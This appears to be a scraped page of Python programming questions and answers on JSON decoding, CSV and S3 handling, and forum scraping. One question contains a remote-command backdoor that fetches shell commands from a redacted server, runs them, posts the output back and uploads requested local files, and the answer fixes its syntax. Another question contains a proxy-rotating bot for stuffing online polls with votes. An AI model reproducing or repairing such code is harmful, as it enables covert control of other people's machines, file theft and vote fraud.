I have some code that works when I run it on a Windows machine, but when it runs in Ubuntu on a google ComputeEngine VM I get the following error.
Traceback (most recent call last): File "firehose_get.py", line 43,
in
print(json.dumps(json.loads(line),indent=2)) File "/home/stuartkirkup/anaconda3/lib/python3.5/json/init.py", line
312, in loads
s.class.name)) TypeError: the JSON object must be str, not 'bytes'
It's exactly the same code that runs fine on Windows. I've done quite a bit of reading and it looks like an encoding issue - and as you'll see from some of the commented out sections in my code I've tried some ways to change the encoding but without joy. I've tried various things but can't work out how to debug it ... I'm fairly new to Python
I'm using Anaconda which some further reading says it has an ill advised setdefaultencoding hack built in.
Here is the stream header showing it's chunked data, which I believe is why it's bytes
{'Transfer-Encoding': 'chunked', 'Date': 'Thu, 17 Aug 2017 16:53:35 GMT', 'Content-Type': 'application/json', 'x-se
rver': 'db220', 'Content-Encoding': 'gzip'}
Code file - firehose_requests.py (with api keys infor replaced by ####)
import requests
MAX_REDIRECTS = 1000
def get(url, **kwargs):
kwargs.setdefault('allow_redirects', False)
for i in range(0, MAX_REDIRECTS):
response = requests.get(url, **kwargs)
#response.encoding = 'utf-8'
print ("test")
print (response.headers)
if response.status_code == requests.codes.moved or \
response.status_code == requests.codes.found:
if 'Location' in response.headers:
url = response.headers['Location']
content_type_header = response.headers.get('content_type')
print (content_type_header)
continue
else:
print ("Error when reading the Location field from HTTP headers")
return response
Code file - firehose_get.py
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth
# Make it work for Python 2+3 and with Unicode
import io
try:
to_unicode = unicode
except NameError:
to_unicode = str
#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##############-livestream-poc','488##############1')).json()
#print(request_access_token)
#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)
url = 'https://livestream.adobe.net/api/1/stream/eecoukvanilla-##############'
sleep_sec=0
rec_count=10
bearer = "Bearer " + access_token
headers = {"Authorization": bearer,"accept-encoding":"gzip,deflate"}
r = firehose_requests.get(url, stream=True, headers=headers)
#open empty file
with open('output_file2.txt', 'w') as outfile:
print('', file=outfile)
#Read the Stream
if r.status_code == requests.codes.ok:
count = 0
for line in r.iter_lines():
if line:
#write to screen
print ("\r\n")
print(json.dumps(json.loads(line),indent=2))
#append data to file
with open('output_file2.txt', 'a') as outfile:
print("\r\n", file=outfile)
print(json.dumps(json.loads(line),ensure_ascii = False),file=outfile)
#with io.open('output_file2.txt', 'w', encoding='utf8') as outfile:
# str_ = json.dumps(json.loads(line),
# indent=4, sort_keys=True,
# separators=(',', ': '), ensure_ascii=False)
# outfile.write(to_unicode(str_))
#Break the loop if there are is a -n argument
if rec_count is not None:
count = count + 1
if count >= rec_count:
break
#How long to wait between writes
if sleep_sec is not None :
sleep(sleep_sec)
else:
print ("There was a problem with the Request")
print ("Returned Status Code: " + str(r.status_code))
Thanks
OK I worked it out. I found a lot of people also getting this error but no solutions posted, so this is how I did it
parse and decode the JSON like this
json_parsed = json.loads(line.decode("utf-8"))
Full code:
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth
# Make it work for Python 2+3 and with Unicode
import io
try:
to_unicode = unicode
except NameError:
to_unicode = str
#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##########-livestream-poc','488################1')).json()
#print(request_access_token)
#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)
url = 'https://livestream.adobe.net/api/1/stream/##################'
sleep_sec=0
rec_count=10
bearer = "Bearer " + access_token
headers = {"Authorization": bearer,"accept-encoding":"gzip,deflate"}
r = firehose_requests.get(url, stream=True, headers=headers, )
#open empty file
with open('output_file.txt', 'w') as outfile:
print('', file=outfile)
#Read the Stream
if r.status_code == requests.codes.ok:
count = 0
for line in r.iter_lines():
if line:
#parse and decode the JSON
json_parsed = json.loads(line.decode("utf-8"))
#write to screen
#print (str(json_parsed))
#append data to file
with open('output_file.txt', 'a') as outfile:
#write to file
print(json_parsed,file=outfile)
#Break the loop if there are is a -n argument
if rec_count is not None:
count = count + 1
if count >= rec_count:
break
#How long to wait between writes
if sleep_sec is not None :
sleep(sleep_sec)
else:
print ("There was a problem with the Request")
print ("Returned Status Code: " + str(r.status_code))
Related
Im really hobbist python guys so i dont know hwy is it like this? I think it should be working fine? Can someone explain my why this is not working properly? Im really lost. There is option with arguments like -v is number of votes -s survey url id -t target box that you want to check by getting its id from oid. Its based very much on code that i found on the internet. For me it all looks good? i guess. Is that can be problem with option type strings?
That is the exact thing that this code gives me on terminal:
[#] Flushing usedProxies.txt file...
Traceback (most recent call last):
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 76, in __init__
renewlist=self.renewProxyList();
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 257, in renewProxyList
content = urllib.request.urlopen(url).read()
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 216, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 525, in open
response = meth(req, response)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 634, in http_response
response = self.parent.error(
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 563, in error
return self._call_chain(*args)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 496, in _call_chain
result = func(*args)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 643, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 403: Forbidden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 266, in <module>
Strawpoll_Multivote()
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 151, in __init__
print("[!] " + ex.strerror + ": " + ex.filename)
try:
from optparse import OptionParser
import sys
import os
import re
from bs4 import BeautifulSoup
import urllib.request
import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
except ImportError as msg:
print("[!] Library not installed: " + str(msg))
exit()
class Strawpoll_Multivote:
# Initialization
maxVotes = 1
voteFor = ""
surveyId = ""
domainEnd = "com"
proxyListFile = "proxies.txt"
saveStateFile = "usedProxies.txt"
proxyTimeout = 10 # in seconds
currentProxyPointer = 0
successfulVotes = 0
def __init__(self):
try:
# Parse Arguments
parser = OptionParser()
parser.add_option("-v", "--votes", action="store", type="string", dest="votes",help="number of times to vote")
parser.add_option("-s", "--survey", action="store", type="string", dest="survey",help="url id of the survey")
parser.add_option("-t", "--target", action="store", type="string", dest="target", help="checkbox id to vote for")
parser.add_option("-d", "--domain", action="store", type="string", dest="domain", help="domain name end")
parser.add_option("-f", "--flush", action="store_true", dest="flush",help="Flushes the used proxy list")
parser.add_option("-r", "--renew", action="store_true", dest="renew",help="Renews the proxy list")
(options, args) = parser.parse_args()
if len(sys.argv) > 2:
if options.votes is None:
print("[!] Times to vote not defined with: -v ")
exit(1)
if options.survey is None:
print("[!] Url id of the survey defined with: -s")
exit(1)
if options.target is None:
print("[!] Target checkbox to vote for is not defined with: -t")
exit(1)
try:
self.maxVotes = int(options.votes)
except ValueError:
print("[!] You incorrectly defined a non integer for -v")
# Save arguments into global variable
self.voteFor = options.target
self.surveyId = options.survey
# Flush usedProxies.txt
if options.flush == True:
print("[#] Flushing usedProxies.txt file...")
os.remove(self.saveStateFile)
open(self.saveStateFile, 'w+')
# Alter domain if not None.
if options.domain is not None:
self.domainEnd = options.domain
if options.renew == True:
renewlist=self.renewProxyList();
os.remove(self.proxyListFile)
with open(self.proxyListFile, "a") as myfile:
for i in renewlist:
myfile.write(i)
# Print help
else:
print("[!] Not enough arguments given")
print()
parser.print_help()
exit()
# Read proxy list file
alreadyUsedProxy = False
proxyList = open(self.proxyListFile).read().split('\n')
proxyList2 = None
# Check if saveState.xml exists and read file
if os.path.isfile(self.saveStateFile):
proxyList2 = open(self.saveStateFile).read().split('\n')
# Print remaining proxies
if proxyList2 is not None:
print("[#] Number of proxies remaining in old list: " + str(len(proxyList) - len(proxyList2)))
print()
else:
print("[#] Number of proxies in new list: " + str(len(proxyList)))
print()
# Go through proxy list
for proxy in proxyList:
# Check if max votes has been reached
if self.successfulVotes >= self.maxVotes:
break
# Increase number of used proxy integer
self.currentProxyPointer += 1
# Read in saveState.xml if this proxy has already been used
if proxyList2 is not None:
for proxy2 in proxyList2:
if proxy == proxy2:
alreadyUsedProxy = True
break
# If it has been used print message and continue to next proxy
if alreadyUsedProxy == True:
print("["+ str(self.currentProxyPointer) +"] Skipping proxy: " + proxy)
alreadyUsedProxy = False
continue
# Print current proxy information
print("["+ str(self.currentProxyPointer) +"] New proxy: " + proxy)
print("[#] Connecting... ")
# Connect to strawpoll and send vote
# self.sendToWeb('http://' + proxy,'https://' + proxy)
self.webdriverManipulation(proxy);
# Write used proxy into saveState.xml
self.writeUsedProxy(proxy)
print()
# Check if max votes has been reached
if self.successfulVotes >= self.maxVotes:
print("[*] Finished voting: " + str(self.successfulVotes) + ' times.')
else:
print("[*] Finished every proxy in the list.")
exit()
except IOError as ex:
print("[!] " + ex.strerror + ": " + ex.filename)
except KeyboardInterrupt as ex:
print("[#] Ending procedure...")
print("[#] Programm aborted")
exit()
def writeUsedProxy(self, proxyIp):
if os.path.isfile(self.saveStateFile):
with open(self.saveStateFile, "a") as myfile:
myfile.write(proxyIp+"\n")
def getIp(self, httpProxy):
proxyDictionary = {"https": httpProxy}
request = requests.get("https://api.ipify.org/", proxies=proxyDictionary)
requestString = str(request.text)
return requestString
# Using selenium and chromedriver to run the voting process on the background
def webdriverManipulation(self,Proxy):
try:
WINDOW_SIZE = "1920,1080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--window-size=%s" % WINDOW_SIZE)
chrome_options.add_argument('--proxy-server=%s' % Proxy)
prefs = {"profile.managed_default_content_settings.images": 2}
chrome_options.add_experimental_option("prefs", prefs)
chrome = webdriver.Chrome(options=chrome_options)
if self.domainEnd == "me":
chrome.get('https://www.strawpoll.' + self.domainEnd + '/' + self.surveyId)
element = chrome.find_element_by_xpath('//*[#value="'+ self.voteFor +'"]')
webdriver.ActionChains(chrome).move_to_element(element).click(element).perform()
submit_button = chrome.find_elements_by_xpath('//*[#type="submit"]')[0]
submit_button.click()
else:
chrome.get('https://strawpoll.' + self.domainEnd + '/' + self.surveyId)
element = chrome.find_element_by_xpath('//*[#name="'+ self.voteFor +'"]')
webdriver.ActionChains(chrome).move_to_element(element).click(element).perform()
submit_button = chrome.find_elements_by_xpath('//*[#id="votebutton"]')[0]
submit_button.click()
chrome.quit()
print("[*] Successfully voted.")
self.successfulVotes += 1
return True
except Exception as exception:
print("[!] Voting failed for the specific proxy.")
chrome.quit()
return False
# Posting through requests (previous version)
def sendToWeb(self,httpProxy, httpsProxy):
try:
headers = \
{
'Host': 'strawpoll.'+ self.domainEnd,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Accept': '*/*',
'Accept-Language': 'en - us, en; q = 0.5',
'Accept-Encoding': 'gzip, deflate',
'Accept-Charset': 'ISO - 8859 - 1, utf - 8; = 0.7, *;q = 0.7',
'Referer': 'https://strawpoll.'+ self.domainEnd +'/' + self.surveyId,
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '29',
'Cookie': 'lang=en',
'DNT': '1',
'Connection': 'close'
}
payload = {'pid': self.surveyId, 'oids': self.voteFor}
proxyDictionary = {"http": httpProxy,"https": httpsProxy}
# Connect to server
r = requests.post('https://strawpoll.' + self.domainEnd + '/vote', data=payload, headers=headers)
json = r.json()
# Check if the vote was successful
if(bool(json['success'])):
print("[*] Successfully voted.")
self.successfulVotes += 1
return True
else:
print("[!] Voting failed.")
return False
except requests.exceptions.Timeout:
print("[!] Timeout")
return False
except requests.exceptions.ConnectionError:
print("[!] Couldn't connect to proxy")
return False
except Exception as exception:
print(str(exception))
return False
# Renew Proxy List
def renewProxyList(self):
final_list=[]
url = "http://proxy-daily.com/"
content = urllib.request.urlopen(url).read()
soup = BeautifulSoup(content,features="html5lib")
center = soup.find_all("center")[0]
div = center.findChildren("div", recursive=False)[0].getText();
children= div.splitlines()
for child in children:
final_list.append(child+"\n")
return (final_list)
# Execute strawpoll_multivote
Strawpoll_Multivote()
The error is descriptive: one of the parts you are atempting to concatenate in your log message is a None object, and the "+" operator is not defined for it.
However, concatenating strings with "+" in Python is usually just done by people learning Python coming from other languages. Other ways of interpolating data in strings are far easier to type and read.
From Python 3.6+ the recomended way is interpolating with "f"strings: strings with an f-prefix to the opening quote, can resolve Python expressions placed inside brackets inside it.
So, just replace your erroring line for:
print(f"[!] { ex.strerror }: { ex.filename}")
Unlike the + operator, string interpolation via f-strings, the %operator or via the .format method will automatically cast its operands to string, and None will not error.
I'm trying to download and iterate over csv file but I'm only reading the headers but no more lines after it
tried using this answer but with no luck
this is my code:
from datetime import datetime
import requests
import csv
def main():
print("python main function")
datetime_object = datetime.now().date()
url = f'https://markets.cboe.com/us/equities/market_statistics/volume_reports/day/{datetime_object}/csv/?mkt=bzx'
print(url)
response = requests.get(url, stream=True)
csv_content = response.content.decode('utf-8')
print(csv_content)
cr = csv.reader(csv_content.splitlines(), delimiter='~')
my_list = list(cr)
for row in my_list:
print(row)
if __name__ == '__main__':
main()
cr = csv.reader(csv_content.splitlines(), delimiter='~')
change to
cr = csv.reader(csv_content.splitlines(), delimiter=',')
And check if You download full file or file with header only use URL in browser ;)
Objective of this code is to read an existing CSV file from a specified S3 bucket into a Dataframe, filter the dataframe for desired columns, and then write the filtered Dataframe to a CSV object using StringIO that I can upload to a different S3 bucket.
Everything works right now except the code block for the function "prepare_file_for_upload". Below is the full code block:
from io import StringIO
import io #unsued at the moment
import logging
import pandas as pd
import boto3
from botocore.exceptions import ClientError
FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
#S3 parameters
source_bucket = 'REPLACE'
source_folder = 'REPLACE/'
dest_bucket = 'REPLACE'
dest_folder = 'REPLACE'
output_name = 'REPLACE'
def get_file_name():
try:
s3 = boto3.client("s3")
logging.info(f'Determining filename from: {source_bucket}/{source_folder}')
bucket_path = s3.list_objects(Bucket=source_bucket, Prefix=source_folder)
file_name =[key['Key'] for key in bucket_path['Contents']][1]
logging.info(file_name)
return file_name
except ClientError as e:
logging.info(f'Unable to determine file name from bucket {source_bucket}/{source_folder}')
logging.info(e)
def get_file_data(file_name):
try:
s3 = boto3.client("s3")
logging.info(f'file name from get data: {file_name}')
obj = s3.get_object(Bucket=source_bucket, Key=file_name)
body = obj['Body']
body_string = body.read().decode('utf-8')
file_data = pd.read_csv(StringIO(body_string))
#logging.info(file_data)
return file_data
except ClientError as e:
logging.info(f'Unable to read {file_name} into datafame')
logging.info(e)
def filter_file_data(file_data):
try:
all_columns = list(file_data.columns)
columns_used = ('col_1', 'col_2', 'col_3')
desired_columns = [x for x in all_columns if x in columns_used]
filtered_data = file_data[desired_columns]
logging.info(type(filtered_data)) #for testing
return filtered_data
except Exception as e:
logging.info('Unable to filter file')
logging.info(e)
The block below is where I am attempting to write the existing DF that was passed to the function using "to_csv" method with StringIO instead of creating a local file. to_csv will write to a local file but does not work with buffer (yes, I tried putting the buffer cursor to start position after and still nothing)
def prepare_file_for_upload(filtered_data): #this is the function block where I am stuck
try:
buffer = StringIO()
output_name = 'FILE_NAME.csv'
#code below is writing to file but can not get to write to buffer
output_file = filtered_data.to_csv(buffer, sep=',')
df = pd.DataFrame(buffer) #for testing
logging.info(df) #for testing
return output_file
except Exception as e:
logging.info(f'Unable to prepare {output_name} for upload')
logging.info(e)
def upload_file(adjusted_file):
try:
#dest_key = f'{dest_folder}/{output_name}'
dest_key = f'{output_name}'
s3 = boto3.resource('s3')
s3.meta.client.upload_file(adjusted_file, dest_bucket, dest_key)
except ClientError as e:
logging.info(f'Unable to upload {output_name} to {dest_key}')
logging.info(e)
def execute_program():
file_name = get_file_name()
file_data = get_file_data(file_name)
filtered_data = filter_file_data(file_data)
adjusted_file = prepare_file_for_upload(filtered_data)
upload_file = upload_file(adjusted_file)
if __name__ == '__main__':
execute_program()
Following solution worked for me:
csv_buffer = StringIO()
output_file = filtered_data.to_csv(csv_buffer)
s3_resource = boto3.resource('s3')
s3_resource.Object(dest_bucket, output_name).put(Body=csv_buffer.getvalue())
When working with a BytesIO object, pay careful attention to the order of operations. In your code, you instantiate the BytesIO object and then fill it via a call to to_csv(). So far so good. But one thing to manage when working with a BytesIO object that is different from a file workflow is the stream position.
After writing data to the stream, the stream position is at the end of the stream. If you try to write from that position, you will likely write nothing! The operation will complete leaving you scratching your head why no results are written to S3. Add a call to seek() with the argument 0 to your function. Here is a demo program that demonstrates:
from io import BytesIO
import boto3
import pandas
from pandas import util
df = util.testing.makeMixedDataFrame()
s3_resource = boto3.resource("s3")
buffer = BytesIO()
df.to_csv(buffer, sep=",", index=False, mode="wb", encoding="UTF-8")
# The following call to `tell()` returns the stream position. 0 is the beginning of the file.
df.tell()
>> 134
# Reposition stream to the beginning by calling `seek(0)` before uploading
df.seek(0)
s3_r.Object("test-bucket", "test_df_from_resource.csv").put(Body=buffer.getvalue())
You should get a response similar to the following (with actual values)
>> {'ResponseMetadata': {'RequestId': 'request-id-value',
'HostId': '###########',
'HTTPStatusCode': 200,
'HTTPHeaders': {'x-amz-id-2': '############',
'x-amz-request-id': '00000',
'date': 'Tue, 31 Aug 2021 00:00:00 GMT',
'x-amz-server-side-encryption': 'value',
'etag': '"xxxx"',
'server': 'AmazonS3',
'content-length': '0'},
'RetryAttempts': 0},
'ETag': '"xxxx"',
'ServerSideEncryption': 'value'}
Changing the code to move the stream position should solve the issues you were facing. It is also worth mentioning, Pandas had a bug that caused unexpected behavior when writing to a bytes object. It was fixed and the sample I provided assumes you are running a version of Python greater than 3.8 and a version of Pandas greater than 1.3.2. Further information on IO can be found in the python documentation.
I am trying to send file using post method in requests module in python 3.5 , I am getting error saying "invalid syntax" in these lines,
files = ('file':open(path,'rb'))
r = requests.post(('htttp://#########', files= files))
Full code is as follows.
import requests
import subprocess
import time
import os
while True:
req = requests.get('htttp://########')
command = req.text
if 'terminate' in command:
break
elif 'grab' in command:
grab,path = command.split('*')
if os.path.exists(path):
url = 'http://#########/store'
files = ('file':open(path,'rb'))
r = requests.post(('htttp://#########', files= files))
else:
post_request = requests.post(url='htttp://#########',data='[-]
Unable to find file !')
else:
CMD = subprocess.Popen(command,shell=True, stderr=subprocess.PIPE,
stdin=subprocess.PIPE,stdout=subprocess.PIPE)
post_request=requests.post(url='htttp://########',data=CMD.stdout.read())
post_request = requests.post(url= 'htttp://######',
data=CMD.stderr.read())
time.sleep(3)
You probably want this:
files = {'file': open(path, 'rb')}
r = requests.post('htttp://#########', files=files)
dicts are created using curly braces, not parentheses, and you had extra parentheses around the parameters in your call to requests.post.
I've almost finished writing my first scraper!
I've run into a snag, however: I can't seem to grab the contents of posts that contain a table (posts that cite another post, in other words).
This is the code that extracts post contents from the soup object. It works just fine:
def getPost_contents(soup0bj):
try:
soup0bj = (soup0bj)
post_contents = []
for content in soup0bj.findAll('', {'class' : 'post_content'}, recursive = 'True'):
post_contents.append(content.text.strip())
...#Error management
return (post_contents)
Here's an example of what I need to scrape (highlighted in yellow):
Problem post
(URL, just in case: http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm#t657906)
How do I get the contents that I've highlighted? And why does my current getPostcontents function not work in this particular instance? As far as I can see, the strings are still under div class=post_contents.
EDIT EDIT EDIT
This is how I am getting my BeautifulSoup:
from bs4 import BeautifulSoup as Soup
def getHTMLsoup(url):
try:
html = urlopen(url)
...#Error management
try:
soup0bj = Soup(html.read().decode('utf-8', 'replace'))
time.sleep(5)
...#Error management
return (soup0bj)
EDIT2 EDIT2 EDIT2
These are the relevant bits of the scraper: (Sorry about the dump!)
from bs4 import BeautifulSoup as Soup
from urllib.request import urlopen, urlretrieve
from urllib.error import HTTPError, URLError
import time, re
def getHTMLsoup(url):
try:
html = urlopen(url)
except HTTPError as e:
return None
print('The server hosting{} is unavailable.'.format(url), '\n')
print('Trying again in 10 minutes...','\n')
time.sleep(600)
getHTMLsoup(url)
except URLError as e:
return None
print('The webpage found at {} is unavailable.'.format(url),'\n')
print('Trying again in 10 minutes...','\n')
time.sleep(600)
getHTMLsoup(url)
try:
soup0bj = Soup(html.read().decode('utf-8', 'replace'))
time.sleep(5)
except AttributeError as e:
return None
print("Ooops, {}'s HTML structure wasn't detected.".format(url),'\n')
return soup0bj
def getMessagetable(soup0bj):
try:
soup0bj = (soup0bj)
messagetable = []
for data in soup0bj.findAll('tr', {'class' : re.compile('message.*')}, recursive = 'True'):
except AttributeError as e:
print(' ')
return (messagetable)
def getTime_stamps(soup0bj):
try:
soup0bj = (soup0bj)
time_stamps = []
for stamp in soup0bj.findAll('span', {'class' : 'topic_posted'}):
time_stamps.append(re.search('..\/..\/20..', stamp.text).group(0))
except AttributeError as e:
print('No time-stamps found. Moving on.','\n')
return (time_stamps)
def getHandles(soup0bj):
try:
soup0bj = (soup0bj)
handles = []
for handle in soup0bj.findAll('span', {'data-id_user' : re.compile('.*')}, limit = 1):
handles.append(handle.text)
except AttributeError as e:
print("")
return (handles)
def getPost_contents(soup0bj):
try:
soup0bj = (soup0bj)
post_contents = []
for content in soup0bj.findAll('div', {'class' : 'post_content'}, recursive = 'True'):
post_contents.append(content.text.strip())
except AttributeError as e:
print('Ooops, something has gone wrong!')
return (post_contents)
html = ('http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm')
for soup in getHTMLsoup(html):
for messagetable in getMessagetable(soup):
print(getTime_stamps(messagetable),'\n')
print(getHandles(messagetable),'\n')
print(getPost_contents(messagetable),'\n')
The problem is your decoding, it is not utf-8, if you remove the "replace" your code will error with:
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe9 in position 253835: invalid continuation byte
The data seems to be latin-1 encoded, decoding to latin-1 causes no errors but the output does look off in certain parts, using.
html = urlopen(r).read().decode("latin-1")
will work but as I mentioned, you get weird output like:
"diabète en cas d'accident de la route ou malaise isolÊ ou autre ???"
Another option would be to pass an accept-charset header:
from urllib.request import Request, urlopen
headers = {"accept-charset":"utf-8"}
r = Request("http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm#t657906",headers=headers)
html = urlopen(r).read()
I get the exact same encoding issue using requests letting it handle the encoding, it is like the data has mixed encoding, some utf-8 and some latin-1. The headers returned from requests show the content-encoding as gzip as :
'Content-Encoding': 'gzip'
if we specify we want gzip and decode:
from urllib.request import Request, urlopen
headers = {"Accept-Encoding":"gzip"}
r = Request("http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm#t657906",headers=headers)
r = urlopen(r)
import gzip
gzipFile = gzip.GzipFile(fileobj=r)
print(gzipFile.read().decode("latin-1"))
We get the same errors with utf-8 and the same weird output decoding to latin-1. Interestingly in python2 both requests and urllib both work fine.
Using chardet:
r = urlopen(r)
import chardet
print(chardet.detect(r.read()))
reckons with around 71 percent confidence that it is ISO-8859-2 but that again gives the same bad output.
{'confidence': 0.711104254322944, 'encoding': 'ISO-8859-2'}